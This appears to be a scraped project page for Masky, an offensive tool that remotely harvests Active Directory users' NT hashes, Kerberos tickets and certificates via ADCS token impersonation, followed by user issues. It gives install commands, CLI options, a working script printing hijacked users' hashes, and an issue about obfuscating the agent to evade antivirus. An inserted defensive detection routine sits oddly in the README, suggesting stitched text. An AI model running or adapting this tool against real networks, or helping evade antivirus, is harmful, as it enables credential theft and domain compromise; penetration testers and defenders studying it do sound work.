
masky's Introduction

Masky


Masky is a Python library providing an alternative way to remotely dump domain users' credentials through an ADCS. A command line tool has been built on top of this library in order to easily gather PFX files, NT hashes and TGTs on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. It only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via Kerberos, and NT hash retrieval via PKINIT). A blog post was published to detail the implemented techniques and how Masky works.

Masky's source code is largely based on the amazing Certify and Certipy tools. I really thank their authors for their research on offensive exploitation techniques against ADCS (see the Acknowledgments section).

Installation

The Masky Python 3 library and its associated CLI can be installed from the public PyPI repository as follows:

pip install masky

The Masky agent executable is already included in the PyPI package.

Moreover, if you need to modify the agent, the C# code can be recompiled via the Visual Studio project located in agent/Masky.sln. It requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. A command line interface was also created on top of it to ease its usage during pentest or red team activities.

For both usages, you first need to retrieve the FQDN of a CA server and the name of the CA deployed via ADCS. This information can be retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target by modifying the existing RasAuto service. Despite the automated roll-back of its initial ImagePath value, an unexpected error during Masky's runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such an unwanted stop.
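From the defender's side, the deployment described above leaves host traces that are straightforward to alert on; the following is an added example (not code from the Masky project) that runs a small detection routine over constructed event records matching this page's own traces: the RasAuto ImagePath rewrite from the warning, and the random eight-letter service name plus \Windows\Temp agent drop visible in the verbose run log quoted in the issues below. The key=value flattening of the events, the use of System log event 7045 (service installed) and Sysmon event 13 (registry value set), and the assumption that RasAuto is normally hosted by svchost.exe are mine.

```python
import re

# Constructed sample records (not real telemetry): one Windows event per line,
# flattened to key=value pairs. 7045 = System log "A service was installed",
# 13 = Sysmon "Registry value set". Values mimic the traces Masky leaves on a
# host: a random 8-letter service name, an agent dropped under \Windows\Temp
# with a random 8-letter name, and the RasAuto ImagePath rewritten to it.
SAMPLE_EVENTS = [
    'EventID=7045 ServiceName=Spooler ImagePath="C:\\Windows\\System32\\spoolsv.exe"',
    'EventID=7045 ServiceName=ocrooivu ImagePath="\\Windows\\Temp\\wydxnkqo.exe"',
    'EventID=13 TargetObject="HKLM\\System\\CurrentControlSet\\Services\\RasAuto\\ImagePath" Details="\\Windows\\Temp\\wydxnkqo.exe"',
    'EventID=13 TargetObject="HKLM\\System\\CurrentControlSet\\Services\\RasAuto\\ImagePath" Details="%SystemRoot%\\System32\\svchost.exe -k netsvcs"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
RANDOM_NAME_RE = re.compile(r"^[a-z]{8}$")
TEMP_DROP_RE = re.compile(r"^\\?windows\\temp\\([a-z]{8})\.exe$", re.IGNORECASE)


def parse_event(line):
    """Turn one flattened record into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def detect(events):
    """Return (event_id, reason) findings for records matching Masky's deployment."""
    findings = []
    for ev in map(parse_event, events):
        eid = ev.get("EventID")
        if eid == "7045":
            svc = ev.get("ServiceName", "")
            drop = TEMP_DROP_RE.match(ev.get("ImagePath", ""))
            if drop and RANDOM_NAME_RE.match(svc):
                findings.append((eid, f"random service '{svc}' installed from Temp drop '{drop.group(1)}.exe'"))
        elif eid == "13" and ev.get("TargetObject", "").lower().endswith(r"\services\rasauto\imagepath"):
            new_value = ev.get("Details", "")
            # Assumption: RasAuto is normally hosted by svchost.exe, so an ImagePath
            # that no longer points at svchost is the state a skipped roll-back leaves.
            if "svchost.exe" not in new_value.lower():
                findings.append((eid, f"RasAuto ImagePath rewritten to '{new_value}'"))
    return findings


if __name__ == "__main__":
    for event_id, reason in detect(SAMPLE_EVENTS):
        print(f"[{event_id}] {reason}")
```

The second Sysmon record, where ImagePath is restored to an svchost.exe command line, is deliberately not flagged: it is what a completed roll-back looks like.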

Command line

The following demo shows a basic usage of Masky targeting 4 remote systems. Its execution collects the NT hashes, CCACHE and PFX files of 3 distinct domain users from the sec.lab testing domain.

Masky CLI demo

Masky also provides the options commonly offered by such tools (thread count, authentication mode, targets loaded from files, etc.).

  __  __           _
 |  \/  | __ _ ___| | ___   _
 | |\/| |/ _` / __| |/ / | | |
 | |  | | (_| \__ \   <| |_| |
 |_|  |_|\__,_|___/_|\_\__,  |
  v0.0.3                 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
             [targets ...]

positional arguments:
  targets               Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
  -h, --help            show this help message and exit
  -v, --verbose         Enable debugging messages
  -ts, --timestamps     Display timestamps for each log
  -t THREADS, --threads THREADS
                        Threadpool size (max 15)

Authentication:
  -d DOMAIN, --domain DOMAIN
                        Domain name to authenticate to
  -u USER, --user USER  Username to authenticate with
  -p PASSWORD, --password PASSWORD
                        Password to authenticate with
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
  -H HASHES, --hashes HASHES
                        Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
                        Certificate Authority Name (SERVER\CA_NAME)

Results:
  -nh, --no-hash        Do not request NT hashes
  -nt, --no-ccache      Do not save ccache files
  -np, --no-pfx         Do not save pfx files
  -o OUTPUT, --output OUTPUT
                        Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exit)

Python library

Below is a simple script using the Masky library to collect the secrets of running domain user sessions on a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
    # Define the authentication parameters
    # (raw string: the CA name contains a backslash, which would otherwise be an invalid escape)
    ca = r"srv-01.sec.lab\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky successfully hijacked at least one user session
    # or if an unexpected error occurred
    if not rslts:
        return False

    # Loop on the MaskyResults object to display hijacked users and to retrieve their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for hijacked in rslts.users:
        print(f"\t - {hijacked.domain}\\{hijacked.name} - {hijacked.nt_hash}")

    return True


if __name__ == "__main__":
    dump_nt_hashes()

Its execution generates the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
         - sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
         - sec\askywalker - 8928e0723012a8471c0084149c4e23b1
         - sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Standalone Masky agent

Since Masky version 0.0.5, the standalone executable agent can be run without the Python CLI.

Here are the arguments:

$> .\Masky.exe /ca:'CA SERVER\CA NAME' (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)

The /ca parameter is mandatory, as for the Python CLI. Moreover, the /currentUser argument has been added to avoid running token impersonation: a simple certificate request is then performed in the current user context, based on the provided template (/template). The /output and /debug parameters allow you to specify the paths where the files will be created.

The default values are the following:

  • currentUser: false (i.e. impersonation is enabled)
  • template: User
  • output: ./Masky_results.txt
  • debug: ./Masky_debug.txt

Masky standalone agent demo

Acknowledgments


masky's Issues

Wrong parameters how to debug ?

Hi,

trying to access the tool for future pentests after the nice podcast but so far no success (yet)

FYI: The host 192.168.16.4 has no AV

$masky -d timatec -u fbu -p 'xxx' -dc-ip 192.168.16.11 -ca "DC01.timatec.local\timatec-DC01-CA" 192.168.16.4 -v
...
[*] Loading options...
[*] 1 target(s) loaded
[o] Initialization of the threadpool (size: 1)
[o] (192.168.16.4) Start of target processing
[o] (192.168.16.4) The Masky agent binary will be uploaded in: \Windows\Temp\wydxnkqo.exe
[o] (192.168.16.4) The Masky agent output will be stored in: \Windows\Temp\kwkcqilt.jpg
[o] (192.168.16.4) The Masky agent errors will be stored in: \Windows\Temp\rxqgmhcr.png
[+] (192.168.16.4) Current user seems to be local administrator, attempting to run Masky agent...
[o] (192.168.16.4) Masky agent was successfuly uploaded in: '\Windows\Temp\wydxnkqo.exe'
[o] (192.168.16.4) The service 'ocrooivu' was successfuly created
[o] (192.168.16.4) The 'ocrooivu' was restarted for command execution
[×] (192.168.16.4) The provided CA server seems to be invalid or unreachable, please check its value
[o] (192.168.16.4) The 'ocrooivu' service binary path has been removed
[*] (192.168.16.4) No user session was hijacked
[o] (192.168.16.4) End of target processing
[*] Exiting...

I've used: -ca "DC01.timatec.local\timatec-DC01-CA"
From Certipy:
more 20221024092059_Certipy.txt
Certificate Authorities
0
CA Name : timatec-DC01-CA
DNS Name : DC01.timatec.local

Masky Agent - Sign Manifest when compiling

Problem

Currently, the Masky agent solution contains ClickOnce or some kind of certificate signing. When you clone the repo and try to compile the agent, the following error comes up:

Unable to find manifest signing certificate in the certificate store.

Solution

This can be fixed with

  1. Project Properties -> Signing -> Tick off "Sign the ClickOnce manifests", or by
  2. Changing the .csproj file with:

<PropertyGroup>
  <SignManifests>false</SignManifests>
</PropertyGroup>

I wasn't sure if this was intended or not. Also, if I were to make a PR to the agent code, is it okay for me to disable the ClickOnce manifest and then make the PR?

Seems some syntax broken in deb package

Hi, there

After updating to the current release, the unpacking process reports syntax problems; it sounds not good with escapes.

python3-masky:
  Installed: 0.2.0-0kali1
  Candidate: 0.2.0-0kali1
  Version table:
 *** 0.2.0-0kali1 500
        500 http://http.kali.org/kali kali-rolling/main amd64 Packages
        500 http://http.kali.org/kali kali-rolling/main i386 Packages
        100 /var/lib/dpkg/status

Here is the unpack process:

Setting up python3-masky (0.2.0-0kali1) ...
/usr/lib/python3/dist-packages/masky/core.py:108: SyntaxWarning: invalid escape sequence '\{'
  f"Start processing PFX of the user '{user_data.domain}\{user_data.name}'"
/usr/lib/python3/dist-packages/masky/core.py:112: SyntaxWarning: invalid escape sequence '\{'
  f"Fail to process gathered certificate related to the user '{user_data.domain}\{user_data.name}'"
/usr/lib/python3/dist-packages/masky/core.py:116: SyntaxWarning: invalid escape sequence '\{'
  f"End processing PFX of the user '{user_data.domain}\{user_data.name}'"
/usr/lib/python3/dist-packages/masky/lib/cert/auth.py:428: SyntaxWarning: invalid escape sequence '\{'
  f"Gathered NT hash for the user '{domain}\{username}': {nt_hash}"
/usr/lib/python3/dist-packages/masky/lib/smb.py:105: SyntaxWarning: invalid escape sequence '\{'
  err_msg = f"The user {self.__domain}\{self.__username} is not local administrator on this system"
/usr/lib/python3/dist-packages/masky/lib/smb.py:108: SyntaxWarning: invalid escape sequence '\{'
  err_msg = f"The provided credentials for the user '{self.__domain}\{self.__username}' are invalids or the user does not exist"
/usr/lib/python3/dist-packages/masky/lib/smb.py:295: SyntaxWarning: invalid escape sequence '\p'
  np_bind = f"ncacn_np:{target_host}[\pipe\svcctl]"
/usr/lib/python3/dist-packages/masky/ui/main.py:20: SyntaxWarning: invalid escape sequence '\/'
  """
/usr/lib/python3/dist-packages/masky/ui/options.py:164: SyntaxWarning: invalid escape sequence '\C'
  help="Certificate Authority Name (SERVER\CA_NAME)",

System.IO.FileNotFoundException: Could not load file or assembly

I needed to obfuscate Masky.exe to bypass antivirus. In file impersonate.cs I changed (redacted). This bypassed antivirus detection. :)

When I run the masky Python module with debugging enabled, or run Masky.exe directly on a target system, I get a lot of errors similar to the following:

System.IO.FileNotFoundException: Could not load file or assembly 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
File name: 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'
   at Masky.Cert.CreateCertRequestMessage()
   at Masky.Cert.GetCertUser()
   at Masky.Impersonate.ExecuteActionWithToken(Action action, IntPtr& NewhProcToken, IntPtr& currentProcHH, Boolean revert)

I don't get any errors if I simply run Masky.exe without any arguments. I don't really know if I broke Masky, or if it's an issue with the installed .Net version on the target systems.

OS info (target system):

OS Name:                   Microsoft Windows Server 2012 R2 Datacenter
OS Version:                6.3.9600 N/A Build 9600

I checked the installed .Net versions (on the target system) and see the following:

C:\>reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4" /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    InstallPath    REG_SZ    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    InstallPath    REG_SZ    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1
